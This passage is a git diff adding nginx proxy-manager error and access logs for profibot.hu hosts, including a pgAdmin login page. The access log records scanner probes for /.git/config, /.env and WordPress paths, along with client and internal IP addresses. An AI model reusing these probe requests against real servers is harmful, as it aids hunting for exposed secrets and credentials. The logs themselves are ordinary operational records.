number) while SSL handshaking to upstream, client: 37.76.43.179, server: net.profibot.hu, request: "GET /favicon.ico HTTP/1.1", upstream: "https://192.168.100.43:81/favicon.ico", host: "net.profibot.hu", referrer: "https://net.profibot.hu/" +2026/01/31 10:14:52 [error] 323#323: *18770 SSL_do_handshake() failed (SSL: error:0A00010B:SSL routines::wrong version number) while SSL handshaking to upstream, client: 147.45.116.17, server: net.profibot.hu, request: "GET /favicon.ico HTTP/1.1", upstream: "https://192.168.100.43:81/favicon.ico", host: "net.profibot.hu" +2026/01/31 10:16:50 [error] 201#201: *2 SSL_do_handshake() failed (SSL: error:0A00010B:SSL routines::wrong version number) while SSL handshaking to upstream, client: 37.76.43.179, server: net.profibot.hu, request: "GET / HTTP/1.1", upstream: "https://192.168.100.43:81/", host: "net.profibot.hu" +2026/01/31 10:16:50 [error] 201#201: *2 SSL_do_handshake() failed (SSL: error:0A00010B:SSL routines::wrong version number) while SSL handshaking to upstream, client: 37.76.43.179, server: net.profibot.hu, request: "GET /favicon.ico HTTP/1.1", upstream: "https://192.168.100.43:81/favicon.ico", host: "net.profibot.hu", referrer: "https://net.profibot.hu/" +2026/01/31 10:16:51 [error] 201#201: *2 SSL_do_handshake() failed (SSL: error:0A00010B:SSL routines::wrong version number) while SSL handshaking to upstream, client: 37.76.43.179, server: net.profibot.hu, request: "GET / HTTP/1.1", upstream: "https://192.168.100.43:81/", host: "net.profibot.hu" +2026/01/31 10:16:51 [error] 201#201: *2 SSL_do_handshake() failed (SSL: error:0A00010B:SSL routines::wrong version number) while SSL handshaking to upstream, client: 37.76.43.179, server: net.profibot.hu, request: "GET /favicon.ico HTTP/1.1", upstream: "https://192.168.100.43:81/favicon.ico", host: "net.profibot.hu", referrer: "https://net.profibot.hu/" +2026/01/31 10:17:53 [error] 204#204: *20 SSL_do_handshake() failed (SSL: error:0A00010B:SSL routines::wrong version number) while SSL handshaking to upstream, client: 37.76.43.179, server: net.profibot.hu, request: "GET / HTTP/1.1", upstream: "https://192.168.100.43:81/", host: "net.profibot.hu" +2026/01/31 10:17:54 [error] 204#204: *20 SSL_do_handshake() failed (SSL: error:0A00010B:SSL routines::wrong version number) while SSL handshaking to upstream, client: 37.76.43.179, server: net.profibot.hu, request: "GET /favicon.ico HTTP/1.1", upstream: "https://192.168.100.43:81/favicon.ico", host: "net.profibot.hu", referrer: "https://net.profibot.hu/" +2026/01/31 10:20:58 [error] 217#217: *70 SSL_do_handshake() failed (SSL: error:0A00010B:SSL routines::wrong version number) while SSL handshaking to upstream, client: 37.76.43.179, server: net.profibot.hu, request: "GET /favicon.ico HTTP/1.1", upstream: "https://192.168.100.43:81/favicon.ico", host: "net.profibot.hu", referrer: "https://net.profibot.hu/" +2026/01/31 10:21:00 [error] 217#217: *70 SSL_do_handshake() failed (SSL: error:0A00010B:SSL routines::wrong version number) while SSL handshaking to upstream, client: 37.76.43.179, server: net.profibot.hu, request: "GET / HTTP/1.1", upstream: "https://192.168.100.43:81/", host: "net.profibot.hu" +2026/01/31 10:21:00 [error] 217#217: *70 SSL_do_handshake() failed (SSL: error:0A00010B:SSL routines::wrong version number) while SSL handshaking to upstream, client: 37.76.43.179, server: net.profibot.hu, request: "GET /favicon.ico HTTP/1.1", upstream: "https://192.168.100.43:81/favicon.ico", host: "net.profibot.hu", referrer: "https://net.profibot.hu/" +2026/01/31 10:22:01 [error] 227#227: *93 SSL_do_handshake() failed (SSL: error:0A00010B:SSL routines::wrong version number) while SSL handshaking to upstream, client: 37.76.43.179, server: net.profibot.hu, request: "GET / HTTP/1.1", upstream: "https://127.17.0.1:81/", host: "net.profibot.hu" +2026/01/31 10:22:01 [error] 227#227: *93 SSL_do_handshake() failed (SSL: error:0A00010B:SSL routines::wrong version number) while SSL handshaking to upstream, client: 37.76.43.179, server: net.profibot.hu, request: "GET /favicon.ico HTTP/1.1", upstream: "https://127.17.0.1:81/favicon.ico", host: "net.profibot.hu", referrer: "https://net.profibot.hu/" +2026/01/31 10:22:16 [error] 226#226: *94 SSL_do_handshake() failed (SSL: error:0A00010B:SSL routines::wrong version number) while SSL handshaking to upstream, client: 37.76.43.179, server: net.profibot.hu, request: "GET / HTTP/1.1", upstream: "https://127.17.0.1:81/", host: "net.profibot.hu" +2026/01/31 10:22:17 [warn] 237#237: *112 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/00/0000000001 while reading upstream, client: 37.76.43.179, server: net.profibot.hu, request: "GET /assets/index-Bjey8ZS4.js HTTP/1.1", upstream: "http://127.17.0.1:81/assets/index-Bjey8ZS4.js", host: "net.profibot.hu", referrer: "https://net.profibot.hu/" +2026/01/31 10:22:17 [warn] 235#235: *109 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/00/0000000002 while reading upstream, client: 37.76.43.179, server: net.profibot.hu, request: "GET /assets/index-7pxQYCJT.css HTTP/1.1", upstream: "http://127.17.0.1:81/assets/index-7pxQYCJT.css", host: "net.profibot.hu", referrer: "https://net.profibot.hu/" +2026/01/31 10:23:05 [warn] 235#235: *174 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/00/0000000003 while reading upstream, client: 44.201.8.91, server: net.profibot.hu, request: "GET /assets/index-7pxQYCJT.css HTTP/1.1", upstream: "http://127.17.0.1:81/assets/index-7pxQYCJT.css", host: "net.profibot.hu", referrer: "https://net.profibot.hu/" +2026/01/31 10:23:05 [warn] 235#235: *179 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/00/0000000004 while reading upstream, client: 44.201.8.91, server: net.profibot.hu, request: "GET /assets/index-Bjey8ZS4.js HTTP/1.1", upstream: "http://127.17.0.1:81/assets/index-Bjey8ZS4.js", host: "net.profibot.hu", referrer: "https://net.profibot.hu/" +2026/01/31 10:39:19 [warn] 253#253: *328 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/00/0000000006 while reading upstream, client: 104.164.126.160, server: net.profibot.hu, request: "GET /assets/index-Bjey8ZS4.js HTTP/1.1", upstream: "http://127.17.0.1:81/assets/index-Bjey8ZS4.js", host: "net.profibot.hu" +2026/01/31 10:58:31 [warn] 254#254: *350 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/00/0000000007 while reading upstream, client: 34.248.137.227, server: net.profibot.hu, request: "GET /assets/index-Bjey8ZS4.js HTTP/1.1", upstream: "http://127.17.0.1:81/assets/index-Bjey8ZS4.js", host: "net.profibot.hu", referrer: "https://net.profibot.hu/" +2026/01/31 10:58:31 [warn] 254#254: *349 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/00/0000000008 while reading upstream, client: 34.248.137.227, server: net.profibot.hu, request: "GET /assets/index-7pxQYCJT.css HTTP/1.1", upstream: "http://127.17.0.1:81/assets/index-7pxQYCJT.css", host: "net.profibot.hu", referrer: "https://net.profibot.hu/" +2026/01/31 11:12:28 [warn] 256#256: *413 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/00/0000000009 while reading upstream, client: 104.164.173.9, server: net.profibot.hu, request: "GET /assets/index-Bjey8ZS4.js HTTP/1.1", upstream: "http://127.17.0.1:81/assets/index-Bjey8ZS4.js", host: "net.profibot.hu" +2026/01/31 11:35:40 [warn] 256#256: *458 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/01/0000000010 while reading upstream, client: 52.42.39.195, server: net.profibot.hu, request: "GET /assets/index-Bjey8ZS4.js HTTP/1.1", upstream: "http://127.17.0.1:81/assets/index-Bjey8ZS4.js", host: "net.profibot.hu", referrer: "https://net.profibot.hu/" +2026/01/31 11:35:40 [warn] 256#256: *457 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/01/0000000011 while reading upstream, client: 52.42.39.195, server: net.profibot.hu, request: "GET /assets/index-7pxQYCJT.css HTTP/1.1", upstream: "http://127.17.0.1:81/assets/index-7pxQYCJT.css", host: "net.profibot.hu", referrer: "https://net.profibot.hu/" +2026/01/31 11:35:45 [warn] 255#255: *479 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/01/0000000012 while reading upstream, client: 52.42.39.195, server: net.profibot.hu, request: "GET /assets/index-Bjey8ZS4.js HTTP/1.1", upstream: "http://127.17.0.1:81/assets/index-Bjey8ZS4.js", host: "net.profibot.hu", referrer: "https://net.profibot.hu/" +2026/01/31 11:35:46 [warn] 255#255: *478 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/01/0000000013 while reading upstream, client: 52.42.39.195, server: net.profibot.hu, request: "GET /assets/index-7pxQYCJT.css HTTP/1.1", upstream: "http://127.17.0.1:81/assets/index-7pxQYCJT.css", host: "net.profibot.hu", referrer: "https://net.profibot.hu/" +2026/01/31 12:33:13 [warn] 253#253: *732 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/01/0000000017 while reading upstream, client: 23.27.145.36, server: net.profibot.hu, request: "GET /assets/index-7pxQYCJT.css HTTP/1.1", upstream: "http://127.17.0.1:81/assets/index-7pxQYCJT.css", host: "net.profibot.hu", referrer: "https://net.profibot.hu/" +2026/01/31 12:33:13 [warn] 254#254: *737 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/01/0000000018 while reading upstream, client: 23.27.145.36, server: net.profibot.hu, request: "GET /assets/index-Bjey8ZS4.js HTTP/1.1", upstream: "http://127.17.0.1:81/assets/index-Bjey8ZS4.js", host: "net.profibot.hu", referrer: "https://net.profibot.hu/" +2026/01/31 14:33:27 [warn] 256#256: *869 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/01/0000000019 while reading upstream, client: 216.73.216.89, server: net.profibot.hu, request: "GET /assets/index-7pxQYCJT.css HTTP/1.1", upstream: "http://127.17.0.1:81/assets/index-7pxQYCJT.css", host: "net.profibot.hu" +2026/01/31 14:34:36 [warn] 256#256: *875 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/02/0000000020 while reading upstream, client: 216.73.216.89, server: net.profibot.hu, request: "GET /assets/index-Bjey8ZS4.js HTTP/1.1", upstream: "http://127.17.0.1:81/assets/index-Bjey8ZS4.js", host: "net.profibot.hu" +2026/02/01 00:42:26 [warn] 268#268: *6098 using uninitialized "server" variable while logging request, client: 208.84.101.66, server: net.profibot.hu +2026/02/01 06:08:52 [warn] 274#274: *9270 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/99/0000002999 while reading upstream, client: 195.178.110.132, server: net.profibot.hu, request: "GET /assets/index-Bjey8ZS4.js HTTP/1.1", upstream: "http://127.17.0.1:81/assets/index-Bjey8ZS4.js", host: "net.profibot.hu" +2026/02/01 09:15:47 [warn] 274#274: *10911 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/74/0000003743 while reading upstream, client: 45.148.10.238, server: net.profibot.hu, request: "GET /assets/index-Bjey8ZS4.js HTTP/1.1", upstream: "http://127.17.0.1:81/assets/index-Bjey8ZS4.js", host: "net.profibot.hu" +2026/02/01 09:15:59 [warn] 274#274: *10918 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/74/0000003744 while reading upstream, client: 45.148.10.238, server: net.profibot.hu, request: "GET /assets/index-Bjey8ZS4.js HTTP/1.1", upstream: "http://127.17.0.1:81/assets/index-Bjey8ZS4.js", host: "net.profibot.hu" +2026/02/01 09:16:12 [warn] 274#274: *10924 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/74/0000003745 while reading upstream, client: 45.148.10.238, server: net.profibot.hu, request: "GET /assets/index-Bjey8ZS4.js HTTP/1.1", upstream: "http://127.17.0.1:81/assets/index-Bjey8ZS4.js", host: "net.profibot.hu" +2026/02/01 09:20:10 [warn] 274#274: *10931 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/74/0000003746 while reading upstream, client: 149.88.100.207, server: net.profibot.hu, request: "GET /assets/index-7pxQYCJT.css HTTP/1.1", upstream: "http://127.17.0.1:81/assets/index-7pxQYCJT.css", host: "net.profibot.hu", referrer: "https://net.profibot.hu/" +2026/02/01 09:20:10 [warn] 274#274: *10936 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/74/0000003747 while reading upstream, client: 149.88.100.207, server: net.profibot.hu, request: "GET /assets/index-Bjey8ZS4.js HTTP/1.1", upstream: "http://127.17.0.1:81/assets/index-Bjey8ZS4.js", host: "net.profibot.hu", referrer: "https://net.profibot.hu/" +2026/02/01 09:20:18 [warn] 274#274: *10953 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/74/0000003748 while reading upstream, client: 217.138.216.149, server: net.profibot.hu, request: "GET /assets/index-7pxQYCJT.css HTTP/1.1", upstream: "http://127.17.0.1:81/assets/index-7pxQYCJT.css", host: "net.profibot.hu", referrer: "https://net.profibot.hu/" +2026/02/01 09:20:18 [warn] 274#274: *10959 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/74/0000003749 while reading upstream, client: 217.138.216.149, server: net.profibot.hu, request: "GET /assets/index-Bjey8ZS4.js HTTP/1.1", upstream: "http://127.17.0.1:81/assets/index-Bjey8ZS4.js", host: "net.profibot.hu", referrer: "https://net.profibot.hu/" +2026/02/02 00:26:59 [warn] 296#296: *16651 using uninitialized "server" variable while logging request, client: 208.84.101.66, server: net.profibot.hu diff --git a/proxy-manager/data/logs/proxy-host-1_access.log b/proxy-manager/data/logs/proxy-host-1_access.log new file mode 100755 index 0000000..324a2a1 --- /dev/null +++ b/proxy-manager/data/logs/proxy-host-1_access.log @@ -0,0 +1,3173 @@ +[12/Jan/2026:07:36:41 +0000] - 404 404 - GET https db.profibot.hu "/.git/config" [Client 45.148.10.238] [Length 184] [Gzip 1.20] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36" "-" +[12/Jan/2026:10:22:42 +0000] - - 301 - GET http db.profibot.hu "/" [Client 129.212.226.110] [Length 166] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" "-" +[12/Jan/2026:10:22:43 +0000] - 302 302 - GET https db.profibot.hu "/" [Client 129.212.226.110] [Length 213] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" "-" +[12/Jan/2026:10:22:43 +0000] - 404 404 - GET https db.profibot.hu "//wp-includes/wlwmanifest.xml" [Client 129.212.226.110] [Length 207] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" "-" +[12/Jan/2026:10:22:44 +0000] - 404 404 - GET https db.profibot.hu "//xmlrpc.php?rsd" [Client 129.212.226.110] [Length 207] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" "-" +[12/Jan/2026:10:22:44 +0000] - 302 302 - GET https db.profibot.hu "/" [Client 129.212.226.110] [Length 213] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" "-" +[12/Jan/2026:10:22:44 +0000] - 404 404 - GET https db.profibot.hu "//blog/wp-includes/wlwmanifest.xml" [Client 129.212.226.110] [Length 207] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" "-" +[12/Jan/2026:10:22:44 +0000] - 404 404 - GET https db.profibot.hu "//web/wp-includes/wlwmanifest.xml" [Client 129.212.226.110] [Length 207] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" "-" +[12/Jan/2026:10:22:45 +0000] - 404 404 - GET https db.profibot.hu "//wordpress/wp-includes/wlwmanifest.xml" [Client 129.212.226.110] [Length 207] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" "-" +[12/Jan/2026:10:22:45 +0000] - 404 404 - GET https db.profibot.hu "//website/wp-includes/wlwmanifest.xml" [Client 129.212.226.110] [Length 207] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" "-" +[12/Jan/2026:10:22:45 +0000] - 404 404 - GET https db.profibot.hu "//wp/wp-includes/wlwmanifest.xml" [Client 129.212.226.110] [Length 207] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" "-" +[12/Jan/2026:10:22:46 +0000] - 404 404 - GET https db.profibot.hu "//news/wp-includes/wlwmanifest.xml" [Client 129.212.226.110] [Length 207] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" "-" +[12/Jan/2026:10:22:46 +0000] - 404 404 - GET https db.profibot.hu "//2018/wp-includes/wlwmanifest.xml" [Client 129.212.226.110] [Length 207] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" "-" +[12/Jan/2026:10:22:46 +0000] - 404 404 - GET https db.profibot.hu "//2019/wp-includes/wlwmanifest.xml" [Client 129.212.226.110] [Length 207] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" "-" +[12/Jan/2026:10:22:47 +0000] - 404 404 - GET https db.profibot.hu "//shop/wp-includes/wlwmanifest.xml" [Client 129.212.226.110] [Length 207] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" "-" +[12/Jan/2026:10:22:47 +0000] - 404 404 - GET https db.profibot.hu "//wp1/wp-includes/wlwmanifest.xml" [Client 129.212.226.110] [Length 207] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" "-" +[12/Jan/2026:10:22:47 +0000] - 404 404 - GET https db.profibot.hu "//test/wp-includes/wlwmanifest.xml" [Client 129.212.226.110] [Length 207] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" "-" +[12/Jan/2026:10:22:47 +0000] - 404 404 - GET https db.profibot.hu "//media/wp-includes/wlwmanifest.xml" [Client 129.212.226.110] [Length 207] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" "-" +[12/Jan/2026:10:22:48 +0000] - 404 404 - GET https db.profibot.hu "//wp2/wp-includes/wlwmanifest.xml" [Client 129.212.226.110] [Length 207] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" "-" +[12/Jan/2026:10:22:48 +0000] - 404 404 - GET https db.profibot.hu "//site/wp-includes/wlwmanifest.xml" [Client 129.212.226.110] [Length 207] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" "-" +[12/Jan/2026:10:22:48 +0000] - 404 404 - GET https db.profibot.hu "//cms/wp-includes/wlwmanifest.xml" [Client 129.212.226.110] [Length 207] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" "-" +[12/Jan/2026:10:22:49 +0000] - 404 404 - GET https db.profibot.hu "//sito/wp-includes/wlwmanifest.xml" [Client 129.212.226.110] [Length 207] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" "-" +[12/Jan/2026:10:22:49 +0000] - - 400 - - https db.profibot.hu "-" [Client 129.212.226.110] [Length 0] [Gzip -] [Sent-to ] "-" "-" +[12/Jan/2026:16:28:44 +0000] - 302 302 - GET https db.profibot.hu "/" [Client 37.76.14.45] [Length 213] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "-" +[12/Jan/2026:16:28:44 +0000] - 200 200 - GET https db.profibot.hu "/login?next=/" [Client 37.76.14.45] [Length 2494] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "-" +[12/Jan/2026:16:28:45 +0000] - 302 302 - GET https db.profibot.hu "/favicon.ico?ver=91100" [Client 37.76.14.45] [Length 245] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "https://db.profibot.hu/login?next=/" +[12/Jan/2026:16:28:45 +0000] - 200 200 - GET https db.profibot.hu "/tools/translations.js?ver=91100" [Client 37.76.14.45] [Length 321] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "https://db.profibot.hu/login?next=/" +[12/Jan/2026:16:28:45 +0000] - 200 200 - GET https db.profibot.hu "/browser/js/endpoints.js?ver=91100" [Client 37.76.14.45] [Length 3738] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "https://db.profibot.hu/login?next=/" +[12/Jan/2026:16:48:32 +0000] - 302 302 - GET https db.profibot.hu "/" [Client 37.76.9.232] [Length 205] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "-" +[12/Jan/2026:16:48:32 +0000] - 302 302 - GET https db.profibot.hu "/browser/" [Client 37.76.9.232] [Length 229] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "-" +[12/Jan/2026:16:48:32 +0000] - 200 200 - GET https db.profibot.hu "/login?next=/browser/" [Client 37.76.9.232] [Length 2494] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "-" +[12/Jan/2026:16:48:33 +0000] - 200 200 - GET https db.profibot.hu "/browser/js/endpoints.js?ver=91100" [Client 37.76.9.232] [Length 3738] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "https://db.profibot.hu/login?next=/browser/" +[12/Jan/2026:16:48:33 +0000] - 200 200 - GET https db.profibot.hu "/tools/translations.js?ver=91100" [Client 37.76.9.232] [Length 321] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "https://db.profibot.hu/login?next=/browser/" +[12/Jan/2026:19:37:33 +0000] - - 301 - GET http db.profibot.hu "/" [Client 104.168.28.15] [Length 166] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (Macintosh; Intel Mac OS X 15_7_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/26.0 Safari/605.1.15" "-" +[12/Jan/2026:19:37:34 +0000] - 302 302 - GET https db.profibot.hu "/" [Client 104.168.28.15] [Length 213] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (Macintosh; Intel Mac OS X 15_7_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/26.0 Safari/605.1.15" "http://db.profibot.hu/" +[12/Jan/2026:19:37:34 +0000] - 200 200 - GET https db.profibot.hu "/login?next=/" [Client 104.168.28.15] [Length 2391] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (Macintosh; Intel Mac OS X 15_7_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/26.0 Safari/605.1.15" "https://db.profibot.hu/" +[13/Jan/2026:04:35:00 +0000] - 404 404 - GET https db.profibot.hu "/.env" [Client 204.76.203.25] [Length 207] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.3" "-" +[13/Jan/2026:08:21:03 +0000] - 302 302 - GET https db.profibot.hu "/" [Client 84.1.26.27] [Length 213] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "-" +[13/Jan/2026:08:21:03 +0000] - 200 200 - GET https db.profibot.hu "/login?next=/" [Client 84.1.26.27] [Length 2494] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "-" +[13/Jan/2026:08:21:03 +0000] - 200 200 - GET https db.profibot.hu "/static/js/generated/style.css?ver=91100" [Client 84.1.26.27] [Length 91437] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/login?next=/" +[13/Jan/2026:08:21:03 +0000] - 200 200 - GET https db.profibot.hu "/static/vendor/require/require.min.js?ver=91100" [Client 84.1.26.27] [Length 7187] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/login?next=/" +[13/Jan/2026:08:21:03 +0000] - 200 200 - GET https db.profibot.hu "/static/js/generated/pgadmin_commons.js?ver=91100" [Client 84.1.26.27] [Length 5996] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/login?next=/" +[13/Jan/2026:08:21:03 +0000] - 200 200 - GET https db.profibot.hu "/static/js/generated/vendor.react.js?ver=91100" [Client 84.1.26.27] [Length 153691] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/login?next=/" +[13/Jan/2026:08:21:03 +0000] - 200 200 - GET https db.profibot.hu "/static/js/generated/vendor.sqleditor.js?ver=91100" [Client 84.1.26.27] [Length 172313] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/login?next=/" +[13/Jan/2026:08:21:03 +0000] - 200 200 - GET https db.profibot.hu "/static/js/generated/vendor.main.js?ver=91100" [Client 84.1.26.27] [Length 323675] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/login?next=/" +[13/Jan/2026:08:21:03 +0000] - 200 200 - GET https db.profibot.hu "/static/js/generated/vendor.others.js?ver=91100" [Client 84.1.26.27] [Length 2351296] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://db.profibot.hu/login?next=/" +[13/Jan/2026:08:21:04 +0000] - 302 302 - GET https db.profibot.hu "/favicon.ico?ver=91100" [Client 84.1.26.27] [Length 245] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like 